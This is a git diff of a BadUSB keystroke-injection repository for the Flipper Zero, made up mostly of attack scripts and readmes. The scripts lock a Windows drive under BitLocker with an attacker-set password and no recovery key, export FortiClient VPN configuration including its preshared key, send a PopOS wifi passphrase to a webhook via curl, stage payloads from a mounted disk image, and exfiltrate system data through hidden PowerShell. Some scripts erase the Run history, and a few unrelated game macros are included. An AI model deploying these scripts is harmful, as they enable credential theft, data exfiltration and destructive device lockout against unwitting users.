STRING wByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBBAGQAdgBhAG4AYwBlAGQAUwB0AGEAcgB0AHUAcAAAADsABAAAADsABAAAADsAAQAAA
|
||||
STRING F0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBFAG4AYQBiAGwAZQ
|
||||
STRING BCAEQARQBXAGkAdABoAE4AbwBUAFAATQAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAG
|
||||
STRING kAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8
|
||||
STRING AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0
|
||||
STRING AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBLAGU
|
||||
STRING AeQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEY
|
||||
STRING AVgBFAAAAOwBVAHMAZQBUAFAATQBLAGUAeQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0A";
|
||||
|
||||
STRING $bytes = [Convert]::FromBase64String($b64);
|
||||
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||||
|
||||
DELAY 300
|
||||
|
||||
REM Create the GPT file. This is definitely required, but I don't know if it changes per machine
|
||||
STRING $filename = "C:\Windows\System32\GroupPolicy\gpt.ini";
|
||||
|
||||
STRING $b64="W0dlbmVyYWxdDQpnUENNYWNoaW5lRXh0ZW5zaW9uTmFtZXM9W3szNTM3OEVBQy02ODNGLTExRDItQTg5
|
||||
STRING QS0wMEMwNEZCQkNGQTJ9e0QwMkIxRjcyLTM0MDctNDhBRS1CQTg4LUU4MjEzQzY3NjFGMX1dIA0KVmVyc2lvbj01DQo=";
|
||||
|
||||
STRING $bytes = [Convert]::FromBase64String($b64);
|
||||
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||||
|
||||
DELAY 300
|
||||
|
||||
REM have to gpupdate. This will take an undetermined amount of time
|
||||
REM you may need to set this to trigger on a button press rather than a delay
|
||||
STRING gpupdate /force
|
||||
ENTER
|
||||
|
||||
|
||||
DELAY 10000
|
||||
|
||||
REM ==Remove existing keys, in case bitlocker is already enabled==================================
|
||||
STRING manage-bde -protectors -delete C:
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM ==Clear out from messages, in case no protectors, just in case================================
|
||||
ENTER
|
||||
|
||||
DELAY 2000
|
||||
|
||||
REM ==Enable bitlocker on C: with password and skip hardware test=================================
|
||||
STRING manage-bde -on C: -skiphardwaretest
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM ==remove default TPM. We don't want this enabled.=============================================
|
||||
STRING manage-bde -protectors -delete C:
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM ==Manually add password as a protector. SET YOUR PASSWORD HERE!!==============================
|
||||
REM ==MUST BE AT LEAST 8 CHARACTERS LONG OR ELSE IT WILL FAIL=====================================
|
||||
|
||||
DELAY 1000
|
||||
STRING manage-bde -protectors -add C: -password
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING yourpasswordhere
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING yourpasswordhere
|
||||
ENTER
|
||||
DELAY 3000
|
||||
|
||||
REM ==Force the protection to be enabled so that it engages at next reboot========================
|
||||
STRING manage-bde -Protectors -Enable C:
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM ==Optional - Reboot after a delay. Give you time to escape====================================
|
||||
STRING shutdown /r /t 30
|
||||
ENTER
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM ==Clear history of Windows Terminal====================================
|
||||
ALT F7
|
||||
DELAY 200
|
||||
|
||||
REM ==Enable this if you are doing a delayed reboot using traditional command prompt========================
|
||||
REM ALT F4
|
||||
|
||||
REM ==Enable this if you are doing a delayed reboot using GUI x prompt======================================
|
||||
STRING exit
|
||||
ENTER
|
||||
|
||||
REM ==Optional - Clear run history - not needed if using GUI +X ===================================
|
||||
REM GUI r
|
||||
REM DELAY 500
|
||||
REM STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
||||
REM ENTER
|
||||
REM DELAY 300
|
||||
|
||||
REM ==Optional - reboot immediately to lock the computer==========================================
|
||||
REM STRING shutdown /r /t 0
|
||||
REM ENTER
|
||||
|
||||
|
||||
|
||||
|
||||
|
32
BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_turn_off.txt
Normal file
32
BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_turn_off.txt
Normal file
@ -0,0 +1,32 @@
|
||||
REM Turn off bitlocker on C:
|
||||
REM This will begin decrypting the drive. When drive is fully decrypted, the protectors will also be removed.
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Launch command prompt using GUI x (Windows 11-only, but more reliable
|
||||
GUI x
|
||||
DELAY 200
|
||||
STRING A
|
||||
DELAY 1000
|
||||
ALT y
|
||||
DELAY 3000
|
||||
|
||||
REM Launch command prompt using GUI r. More compatible, less reliable
|
||||
REM GUI r
|
||||
REM DELAY 500
|
||||
REM STRING powershell Start-Process cmd -Verb runAs
|
||||
REM ENTER
|
||||
REM DELAY 3000
|
||||
REM ALT y
|
||||
REM DELAY 500
|
||||
|
||||
REM Turn off bitlocker on C:
|
||||
STRING manage-bde -off C:
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM may need this if using traditional command prompt
|
||||
REM ALT F4
|
||||
|
||||
STRING exit
|
||||
ENTER
|
25
BadUSB/emptythevoid-BadUSB/bitlocker/readme.md
Normal file
25
BadUSB/emptythevoid-BadUSB/bitlocker/readme.md
Normal file
@ -0,0 +1,25 @@
|
||||
# Research into manipulating Bitlocker using BadUSB
|
||||
|
||||
All scripts require the current user to have administrative permissions on Windows.
|
||||
|
||||
bitlocker_disable.txt -- Immediately suspends Bitlocker on C:. Does not remove it
|
||||
|
||||
bitlocker_turn_off.txt -- Turns off Bitlocker and begins decryption of C:. When decryption is complete, all key protectors are removed.
|
||||
|
||||
bitlocker_encrypt_password.txt:
|
||||
|
||||
Uses base64 to dump a registry.pol into Windows to allow tablets (Surface Pro, etc) to have pre-boot authentication enabled. Then perform a gpupdate /force (without this, Bitlocker will fail to enable with just a password when it detects the computer is a tablet, aka "slate")
|
||||
|
||||
If Bitlocker is already enabled, all key protectors are removed
|
||||
|
||||
Enable Bitlocker on C: and skip hardware test. If Bitlocker wasn't previously enabled, it gets turned on and drive begins encrypting
|
||||
|
||||
Remove the default TPM key protector that gets created on new Bitlocker enabled C:
|
||||
|
||||
Manually set an attacker-controlled password as the only key protector. Must be at least 8 characters
|
||||
|
||||
Enable the new password protector immediately.
|
||||
|
||||
Optional: Reboot after a pre-defined delay or immediately, clear history, close window.'
|
||||
|
||||
On next boot, Windows will require the attacker-controlled password to boot, and no recovery key will exist.
|
@ -0,0 +1,31 @@
|
||||
REM Forticlient config export using BadUSB
|
||||
REM Author: emptythevoid
|
||||
REM 8/23/24
|
||||
|
||||
|
||||
REM Forticlient file is exported with password. Export does NOT require admin
|
||||
REM This export doesn't include VPN login information, but it does include the preshared key and VPN configuration.
|
||||
REM "C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password
|
||||
REM restore the config to Forticlient using
|
||||
REM Requires Admin Rights
|
||||
REM "C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o import -i 1 -p password
|
||||
|
||||
REM USAGE: Set -p password to your secret password - it can be anything. It's just something Forticlient requires
|
||||
REM Set the output path to wherever you want it to go.
|
||||
|
||||
REM export the forticlient configuration to file
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING "C:\Program Files\Fortinet\FortiClient\FCConfig" -m all -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
DELAY 2000
|
||||
|
||||
REM Clear the Run history and exit
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
||||
ENTER
|
||||
STRING exit
|
||||
ENTER
|
18
BadUSB/emptythevoid-BadUSB/exfiltrate forticlient/readme.md
Normal file
18
BadUSB/emptythevoid-BadUSB/exfiltrate forticlient/readme.md
Normal file
@ -0,0 +1,18 @@
|
||||
This script will export the Forticlient configuration on a Windows client. This serves purely as a proof of concept.
|
||||
|
||||
YOU have to decide what to do with it. As-is, it will export to the desktop of a user account named "user." YOU MUST CHANGE THIS!
|
||||
|
||||
Note: Exporting the configuration in a normal setup does not require admin privileges.
|
||||
|
||||
This export doesn't include VPN login information, but it does include the preshared key and VPN configuration.
|
||||
|
||||
The command that's run to perform the export looks like this, where 'password' is a password that you choose.
|
||||
You'll need it when you try to import it. Change the output path however you want.
|
||||
|
||||
```"C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o export -i 1 -p password```
|
||||
|
||||
To import ("Restore") the configuration, run the below in an admin primpt, with the password you originally set:
|
||||
|
||||
```"C:\Program Files\Fortinet\FortiClient\FCConfig" -m vpn -f C:\users\user\Desktop\forticonfig.conf -o import -i 1 -p password```
|
||||
|
||||
As a final step, the script will clear the history from the run dialog.
|
9
BadUSB/emptythevoid-BadUSB/popos_wifi/README.md
Normal file
9
BadUSB/emptythevoid-BadUSB/popos_wifi/README.md
Normal file
@ -0,0 +1,9 @@
|
||||
Demo of using PopOS 22.04 GUI to exfiltrate the passphrase of the first wifi connection present in network manager. Uses a webhook.
|
||||
|
||||
This is done primarily via GUI to avoid needing sudo trying to extract the data using the terminal.
|
||||
|
||||
Replace <YOUR WEBHOOK HERE> with your own appropriate webhook to capture the data.
|
||||
|
||||
Adjust timings as needed. This is purely a proof-of-concept.
|
||||
|
||||
IT ONLY EXTRACTS THE PASSPHRASE, NOT THE SSID
|
60
BadUSB/emptythevoid-BadUSB/popos_wifi/popos_wifi.txt
Normal file
60
BadUSB/emptythevoid-BadUSB/popos_wifi/popos_wifi.txt
Normal file
@ -0,0 +1,60 @@
|
||||
REM This is BadUSB demo to grab the top-most wifi password from NetworkManager GUI on PopOS (no sudo needed)
|
||||
|
||||
REM Open the app runner and choose network manager
|
||||
REM Have to send GUI command twice to get it to trigger the menu
|
||||
DELAY 1000
|
||||
GUI GUI
|
||||
DELAY 1000
|
||||
STRING network
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
REM Navigate the NetworkManager GUI
|
||||
REM Get to the wifi section and edit first connection listed
|
||||
DELAY 1000
|
||||
STRING wifi
|
||||
DELAY 500
|
||||
ENTER
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 500
|
||||
TAB
|
||||
RIGHTARROW
|
||||
RIGHTARROW
|
||||
RIGHTARROW
|
||||
RIGHTARROW
|
||||
|
||||
REM On the security tab, copy the wifi password to clipboard
|
||||
DELAY 100
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
DELAY 100
|
||||
SPACE
|
||||
SHIFT TAB
|
||||
CTRL C
|
||||
|
||||
REM Make this into a curl payload to exfiltrate
|
||||
DELAY 1000
|
||||
GUI t
|
||||
DELAY 500
|
||||
STRING curl -X POST <YOUR WEBHOOK HERE> -d '{"wifipass":"
|
||||
CTRL-SHIFT v
|
||||
STRING "}'
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM Cleanup
|
||||
REM Need to find a way to clear out the clipboard
|
||||
|
||||
REM Close out of all the Windows that BadUSB opened
|
||||
ALT F4
|
||||
DELAY 100
|
||||
ALT F4
|
||||
DELAY 100
|
||||
ALT F4
|
||||
DELAY 100
|
||||
ALT F4
|
@ -0,0 +1,26 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will copy a payload.txt from the disk image to current user's desktop and open it.
|
||||
REM disk image in Flipper must have the drive label: flipdisk
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
STRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;$Desktoppath=[environment]::getfolderpath("desktop");cp $driveLetter\payload.txt $desktoppath\payload.txt;invoke-item $desktoppath\payload.txt;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
@ -0,0 +1,9 @@
|
||||
Example code that runs powershell via BadUSB that waits for a drive label to mount, and then runs a command. You can use this to read a payload from the Flipper's SD card, such as an executable.
|
||||
|
||||
Usage:
|
||||
|
||||
- Run BadUSB script. Powershell will launch and then wait for the specified drive label to mount.
|
||||
|
||||
- Back out of BadUSB app and switch to Mass Storage app and select a disk image with the matching disk label.
|
||||
|
||||
- Once Windows has mounted the drive, it will run the payload.
|
@ -0,0 +1,26 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will launch calc.exe and exit.
|
||||
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
ALTSTRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;start-process calc.exe;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
34
BadUSB/emptythevoid-BadUSB/read_serial_tests/read_test.ps1
Normal file
34
BadUSB/emptythevoid-BadUSB/read_serial_tests/read_test.ps1
Normal file
@ -0,0 +1,34 @@
|
||||
$port = New-Object System.IO.Ports.SerialPort
|
||||
$port.PortName = "COM10"
|
||||
$port.BaudRate = "115200"
|
||||
$port.Parity = "None"
|
||||
$port.DataBits = 8
|
||||
$port.StopBits = 1
|
||||
$port.ReadTimeout = 9000 # 9 seconds
|
||||
$port.DTREnable = $True
|
||||
$port.open() #opens serial connection
|
||||
|
||||
$SPATH="/ext/apps_data/testfile.txt"
|
||||
$OPATH="C:\users\$env:username\Desktop\outfile.txt"
|
||||
|
||||
echo "attempting to read file"
|
||||
Start-Sleep -m 500 # wait for CLI
|
||||
|
||||
$port.DiscardInBuffer()
|
||||
|
||||
$port.Write("storage read $SPATH `r`n")
|
||||
|
||||
Start-Sleep -m 500
|
||||
|
||||
$outfile = $port.ReadExisting()
|
||||
|
||||
# formatting output file
|
||||
|
||||
# Removes first two leading blank lines, trailing garbage at the end
|
||||
$outfileformat = $outfile.split([string[]]"`r`n", [StringSplitOptions]::None)
|
||||
$outfileformat[2..($outfileformat.length -3)] | Out-File $OPATH
|
||||
|
||||
echo "done"
|
||||
|
||||
$port.close()
|
||||
|
@ -0,0 +1,31 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will copy a payload.txt from the disk image to current user's desktop and open it.
|
||||
REM disk image in Flipper must have the drive label: flipdisk
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
STRING powershell
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM $d is the powershell command to run once the flipper disk image is found
|
||||
STRING $d={$Desktoppath=[environment]::getfolderpath("desktop"); cp $driveLetter\payload.txt $desktoppath\payload.txt;invoke-item $desktoppath\payload.txt;};
|
||||
|
||||
REM below is the powershell stager to look for a disk label called 'flipdisk'.
|
||||
REM Powershell will remain open and wait until it sees the disk mount.
|
||||
REM Once disk is found, command $d from above is executed.
|
||||
STRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;& $d;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
@ -0,0 +1,26 @@
|
||||
REM Author: emptythevoid
|
||||
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
||||
REM Target: Windows 10, 11
|
||||
REM Category: PoC
|
||||
|
||||
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
||||
REM Powershell will wait until a device with the specified drive label is found.
|
||||
REM When drive label is mounted, Powershell will launch calc.exe and exit.
|
||||
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
ALTSTRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;start-process calc.exe;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
||||
|
||||
ENTER
|
||||
|
Binary file not shown.
@ -0,0 +1,30 @@
|
||||
REM pause the RDR2 process while in Online to force a solo lobby on Linux
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Open Terminal - change this depending on your distro
|
||||
CTRL-ALT T
|
||||
|
||||
DELAY 300
|
||||
|
||||
|
||||
REM get PID of RDR2
|
||||
STRING PID=$(pgrep RDR2.exe)
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM pause
|
||||
STRING kill -s SIGSTOP $PID
|
||||
ENTER
|
||||
|
||||
REM How long to wait. 7 seconds should work
|
||||
DELAY 7000
|
||||
|
||||
REM continue process
|
||||
STRING kill -s SIGCONT $PID
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM exit terminal
|
||||
STRING exit
|
||||
ENTER
|
||||
|
File diff suppressed because it is too large
Load Diff
@ -0,0 +1,3 @@
|
||||
For Red Dead Redemption 2 on PC
|
||||
|
||||
Works as a macro to hold down the button that lets the player craft ammo. This is especially useful for split bullets.
|
@ -0,0 +1,4 @@
|
||||
REM Use BadUSB to hold down the button (Enter) to make split bullets in RDR2 for 500 seconds (a little over 8 minutes)
|
||||
|
||||
HOLD ENTER
|
||||
DELAY 500000
|
File diff suppressed because it is too large
Load Diff
73
BadUSB/emptythevoid-BadUSB/save-to-flipper/latest.txt
Normal file
73
BadUSB/emptythevoid-BadUSB/save-to-flipper/latest.txt
Normal file
@ -0,0 +1,73 @@
|
||||
REM Title: Save To Flipper
|
||||
REM Author: emptythevoid and LupusE
|
||||
REM Target: Windows 10, Windows 11
|
||||
REM Version: 1.1
|
||||
REM Category: PoC
|
||||
|
||||
REM The Device IDs (defaults are HID\\VID_046D\&PID_C529 USB\\VID_0483\&PID_5740 )
|
||||
REM The Baud rate (default is 230400)
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal. Launch hidden.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -w h
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM Once payload is deployed and the Flipper is backed out to normal mode, the script will determine which COM port the Flipper is plugged in to by searching for the USB ID. It will then write the output (string) of the executed command to the specified path and file on the Flipper's SD card.
|
||||
|
||||
REM ## Command to execute/data to exfiltrate. Don't forget cast to string.
|
||||
ALTSTRING $d=(Get-ComputerInfo|Out-String);
|
||||
|
||||
REM ## The VendorID and ProductID to Match. If you'd change the BadUSB IDs in the BadKB app or in this script, you need to change these values to match. Otherwise Powershell won't detect the Flipper when it returns to normal mode.
|
||||
ALTSTRING $BHID="HID\\VID_046D\&PID_C529";
|
||||
ALTSTRING $SUSB="USB\\VID_0483\&PID_5740";
|
||||
|
||||
REM ## The path on the Flipper's SD card to store the exfliltrated data
|
||||
ALTSTRING $SPATH="/ext/apps_data/exfil_data"
|
||||
ENTER
|
||||
|
||||
REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.
|
||||
|
||||
ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",230400,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}
|
||||
|
||||
ENTER
|
||||
|
||||
REM Flash Capslock to indicate when to back out of BadUSB mode
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
|
@ -0,0 +1,73 @@
|
||||
REM Title: Save To Flipper (no altstring)
|
||||
REM Author: emptythevoid and LupusE
|
||||
REM Target: Windows 10, Windows 11
|
||||
REM Version: 1.1
|
||||
REM Category: PoC
|
||||
|
||||
REM The Device IDs (defaults are HID\\VID_046D\&PID_C529 USB\\VID_0483\&PID_5740 )
|
||||
REM The Baud rate (default is 230400)
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal. Launch hidden.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -w h
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM Once payload is deployed and the Flipper is backed out to normal mode, the script will determine which COM port the Flipper is plugged in to by searching for the USB ID. It will then write the output (string) of the executed command to the specified path and file on the Flipper's SD card.
|
||||
|
||||
REM ## Command to execute/data to exfiltrate. Don't forget cast to string.
|
||||
STRING $d=(Get-ComputerInfo|Out-String);
|
||||
|
||||
REM ## The VendorID and ProductID to Match. If you'd change the BadUSB IDs in the BadKB app or in this script, you need to change these values to match. Otherwise Powershell won't detect the Flipper when it returns to normal mode.
|
||||
STRING $BHID="HID\\VID_046D\&PID_C529";
|
||||
STRING $SUSB="USB\\VID_0483\&PID_5740";
|
||||
|
||||
REM ## The path on the Flipper's SD card to store the exfliltrated data
|
||||
STRING $SPATH="/ext/apps_data/exfil_data"
|
||||
ENTER
|
||||
|
||||
REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.
|
||||
|
||||
STRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",230400,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}
|
||||
|
||||
ENTER
|
||||
|
||||
REM Flash Capslock to indicate when to back out of BadUSB mode
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
|
49
BadUSB/emptythevoid-BadUSB/save-to-flipper/readme.md
Normal file
49
BadUSB/emptythevoid-BadUSB/save-to-flipper/readme.md
Normal file
@ -0,0 +1,49 @@
|
||||
# Save data from your BadUSB scripts directly to the Flipper's SD Card!
|
||||
|
||||
Inspired by this thread: https://forum.flipperzero.one/t/anyway-to-save-files-back-to-the-flipper-using-badusb/2372
|
||||
|
||||
Credit: Major credit to @LupusE for taking my original proof-of-concept, running with it, and making a proper example payload!
|
||||
|
||||
Changes since original proof-of-concept:
|
||||
|
||||
- Increased baud rate from 115200 to 230400 (thanks for the suggestion Caribou!)
|
||||
|
||||
- Add capslock flashing to indicate when it's time to exit BadUSB mode
|
||||
|
||||
- Starts powershell hidden by default
|
||||
|
||||
- Bypasses Windows Terminal and invokes powershell directly
|
||||
|
||||
- Fast STRING and slower (but more compatible) ALTSTRING versions
|
||||
|
||||
Targets Windows 10, 11
|
||||
|
||||
BadUSB script that uses inline Powershell to enumerate which COM port the Flipper is connected to,
|
||||
and then use Powershell's serial module to interface with Flipper's CLI and write text data to a specified file in Flipper's SD Card. It will automatically detect when the Flipper has exited BadUSB mode before writing the data to the SD card.
|
||||
|
||||
## What makes this method unique?
|
||||
